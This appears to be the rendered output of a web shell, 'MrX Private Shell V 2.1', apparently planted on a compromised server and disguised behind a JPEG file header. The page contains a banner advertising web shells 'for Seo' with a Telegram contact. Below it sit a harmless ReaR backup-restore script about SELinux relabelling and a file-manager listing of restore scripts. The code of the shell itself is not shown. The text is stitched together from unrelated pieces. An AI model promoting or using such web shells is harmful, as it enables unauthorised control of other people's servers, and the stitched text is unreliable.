����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# In some case we re-defined BACKUP_SELINUX_DISABLE=0 in our local.conf file as we want to
# honor SELinux settings during backup (and restore).
# However, and this is the main reason of this script, the 'tar' or 'rsync' programs are not
# capable of correctly handling SELinux labels. This was testing during the the prep phase, e.g. see
# usr/share/rear/prep/RSYNC/GNU/Linux/200_selinux_in_use.sh script.
# When proper SELinux handling is not possible above mentioned script will create the file
# $opath/selinux.autorelabel. Therefore, in this script we check if this file exist and when the
# answer is yes force auto relabeling the files after the reboot to have a correct SELinux labeled system.
# If selinux was turned off for the backup we have to label the
local scheme="$( url_scheme "$BACKUP_URL" )"
local path="$( url_path "$BACKUP_URL" )"
local opath="$( backup_path "$scheme" "$path" )"
if test -f "$opath/selinux.autorelabel" ; then
touch $TARGET_FS_ROOT/.autorelabel
Log "Created /.autorelabel file : after reboot SELinux will relabel all files"
fi
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 100_mount_NETFS_path.sh | File | 140 B | 0644 |
|
| 200_remove_relative_rsync_option.sh | File | 845 B | 0644 |
|
| 380_prepare_multiple_isos.sh | File | 434 B | 0644 |
|
| 400_restore_backup.sh | File | 18.48 KB | 0644 |
|
| 500_selinux_autorelabel.sh | File | 1.05 KB | 0644 |
|
| 510_set_capabilities.sh | File | 1.41 KB | 0644 |
|
| 980_umount_NETFS_dir.sh | File | 154 B | 0644 |
|